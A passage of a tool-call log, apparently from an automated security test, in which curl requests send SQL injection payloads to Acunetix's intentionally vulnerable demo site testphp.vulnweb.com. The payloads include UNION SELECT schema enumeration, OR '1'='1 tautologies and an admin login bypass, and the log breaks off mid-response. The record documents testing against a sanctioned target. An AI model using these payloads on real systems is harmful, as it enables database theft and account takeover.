href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:40.227378"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=1%27%20UNION%20SELECT%201,2,3,4,5--\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=1%27%20UNION%20SELECT%201,2,3,4,5--\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\tError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1",
"timestamp": "2026-01-09T22:29:40.668107"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=1%27%20UNION%20SELECT%20version(),database(),user()--\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=1%27%20UNION%20SELECT%20version(),database(),user()--\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\tError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1",
"timestamp": "2026-01-09T22:29:41.107870"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/artists.php?artist=1%27%20OR%20%271%27=%271\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/artists.php?artist=1%27%20OR%20%271%27=%271\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>artists</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\tError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR '1'='1' at line 1",
"timestamp": "2026-01-09T22:29:41.550157"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/categories.php?cat=1%27%20UNION%20SELECT%20schema_name%20FROM%20information_schema.schemata--\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/categories.php?cat=1%27%20UNION%20SELECT%20schema_name%20FROM%20information_schema.schemata--\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>picture categories</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id=\"pageName\">categories</h2>\n\t<div class='story'><a href='listproducts.php?cat=1'><h3>Posters</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati</div><div class='story'><a href='listproducts.php?cat=2'><h3>Paintings</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati</div><div class='story'><a href='listproducts.php?cat=3'><h3>Stickers</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati</div><div class='story'><a href='listproducts.php?cat=4'><h3>Graffity</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.\n Cras venenati</div></div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:41.982775"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=1%27%20OR%20%271%27=%271&goButton=go\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=1%27%20OR%20%271%27=%271&goButton=go\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id='pageName'>searched for: 1' OR '1'='1</h2></div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:29:42.415065"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=1%27%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables--&goButton=go\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=1%27%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables--&goButton=go\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<h2 id='pageName'>searched for: 1' UNION SELECT table_name FROM information_schema.tables--</h2>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT table_name FROM information_schema.tables--', a.title) > 0 OR LOCAT' at line 3",
"timestamp": "2026-01-09T22:29:42.849757"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/login.php\" -d \"uname=admin%27%20OR%20%271%27=%271--&pass=anything\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/login.php\" -d \"uname=admin%27%20OR%20%271%27=%271--&pass=anything\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>login page</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t<div class=\"story\">\n\t<h3>If you are already registered please enter your login information below:</h3><br>\n\t<form name=\"loginform\" method=\"post\" action=\"userinfo.php\">\n\t<table cellpadding=\"4\" cellspacing=\"1\">\n\t\t<tr><td>Username : </td><td><input name=\"uname\" type=\"text\" size=\"20\" style=\"width:120px;\"></td></tr>\n\t\t<tr><td>Password : </td><td><input name=\"pass\" type=\"password\" size=\"20\" style=\"width:120px;\"></td></tr>\n\t\t<tr><td colspan=\"2\" align=\"right\"><input type=\"submit\" value=\"login\" style=\"width:75px;\"></td></tr>\n\t</table>\n\t</form>\n \t</div>\n\t<div class=\"story\">\n\t<h3>\n You can also <a href=\"signup.php\">signup here</a>.<br>\n Signup disabled. Please use the username <font 